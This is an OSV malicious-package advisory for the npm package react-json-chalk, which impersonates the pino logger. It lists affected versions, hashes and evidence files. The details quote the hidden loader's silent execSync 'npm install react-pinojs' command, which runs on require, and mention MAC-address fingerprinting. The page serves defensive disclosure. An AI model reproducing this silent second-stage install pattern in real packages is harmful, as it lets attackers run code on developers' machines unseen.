MAL-2026-4792

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-json-chalk/MAL-2026-4792.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4792
Published
2026-05-26T08:46:33Z
Modified
2026-06-12T20:01:55.701582873Z
Summary
Malicious code in react-json-chalk (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77)

The package is published as react-json-chalk but its main entry (pino.js) impersonates the pino logger (homepage https://getpino.io, bundled pino source tree, misappropriated description). On require('react-json-chalk'), pino.js immediately loads lib/writer.js, which at module top level tries require('react-pinojs') and, if absent, executes child_process.execSync("npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent") and then require('../../react-pinojs/pino.js'). The flags suppress install output and avoid persisting the dependency in package.json, so consumers get no visible signal that a second package was fetched. The fetched dependency is unpinned, fully controlled by whoever publishes react-pinojs, and its code runs as part of the require() of this package — arbitrary attacker code on the installer's machine on every import. The same lib/writer.js defines getMacAddress() which enumerates non-internal IPv4 interface MAC addresses, consistent with host fingerprinting handed off to the second stage. The package name/contents mismatch (logger source tree under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.

Database specific 
{
    "malicious-packages-origins": [
        {
            "sha256": "c3411327be0927b7a726464d2bd9a590ff4ca61bc08e9170e4c0e482dc18dac2",
            "id": "IN-MAL-2026-004875",
            "source": "amazon-inspector",
            "modified_time": "2026-05-26T08:46:33Z",
            "versions": [
                "13.4.4"
            ],
            "import_time": "2026-05-26T09:17:32.746004914Z"
        },
        {
            "sha256": "1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77",
            "import_time": "2026-06-12T19:43:35.084546687Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:02:15Z",
            "versions": [
                "13.4.6"
            ],
            "id": "IN-MAL-2026-005803"
        }
    ]
}
References
Credits

Affected packages

npm / react-json-chalk

Package

Name
react-json-chalk
View open source insights on deps.dev
Purl
pkg:npm/react-json-chalk

Affected ranges

Affected versions

13.*
13.4.4
13.4.6

Database specific

source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-json-chalk/MAL-2026-4792.json"
cwes 
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators 
{
    "evidence_files": [
        {
            "sha256": "1ab7958719307e09d349a855f54b59c7e5fe94d2f00b05440e2669b702514c7d",
            "tlsh": "05318bd78245a278f3b06aa10e5fa0d1b186e12521507dd83ffc84c367ab4e04ed4fd6",
            "path": "lib/writer.js"
        },
        {
            "sha256": "9b2a5f6bbbfa55f7db60f3e83edf0a71ddf98c5a2830aedcb35af2bd7a9b338e",
            "tlsh": "dc018925ce785da308ec248548290252aa60ed6b584cfd5973d7a32c0f4e5bf68be1ad",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "react-json-chalk-13.4.4.tgz",
            "hashes": {
                "sha1": "724a5212fe4047aca98aa934b3032af19109a35d",
                "sha512_sri": "sha512-oos+FlJaUor3f0YgPAwsmL5gu2ba8WcmyDcObhNNH250f40/6SznsPt4RF5Uc2NRWKKrLpb3zWkWRyluWtXHzQ=="
            }
        }
    ]
}